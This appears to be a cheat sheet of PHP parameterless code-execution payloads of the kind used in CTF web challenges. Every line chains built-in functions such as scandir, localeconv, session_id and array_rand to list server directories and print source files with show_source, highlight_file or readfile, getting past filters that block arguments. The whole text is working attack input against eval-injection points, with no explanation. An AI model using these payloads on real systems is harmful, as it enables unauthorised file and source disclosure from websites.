print_r(scandir(current(localeconv())));
var_dump(scandir(current(localeconv())));
print_r(session_id(session_start()));
var_dump(session_id(session_start()));
highlight_file(session_id(session_start()));
show_source(session_id(session_start()));
readfile(session_id(session_start()));
show_source(array_rand(array_flip(scandir(current(localeconv())))));
highlight_file(array_rand(array_flip(scandir(current(localeconv())))));
readfile(array_rand(array_flip(scandir(current(localeconv())))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
highlight_file(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
readfile(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
var_dump(scandir(chr(ord(strrev(crypt(serialize(array())))))));
show_source(next(array_reverse(scandir(pos(localeconv())))));
highlight_file(next(array_reverse(scandir(pos(localeconv())))));
readfile(next(array_reverse(scandir(pos(localeconv())))));